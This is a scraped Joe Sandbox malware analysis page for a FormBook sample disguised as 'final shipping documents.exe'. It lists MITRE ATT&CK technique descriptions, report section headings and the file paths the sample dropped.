Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report final shipping documents.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fe8167436d6db6c6d2c4bed5d6f2d2c06e142845_f78a65ed_55419b33-5f58-473e-8682-682cae9ed9c9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2914.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER34CD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER350D.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GcrdXwPgmZ.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\final shipping documents.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001c.db

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001d.db

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Windows[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
final shipping documents.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre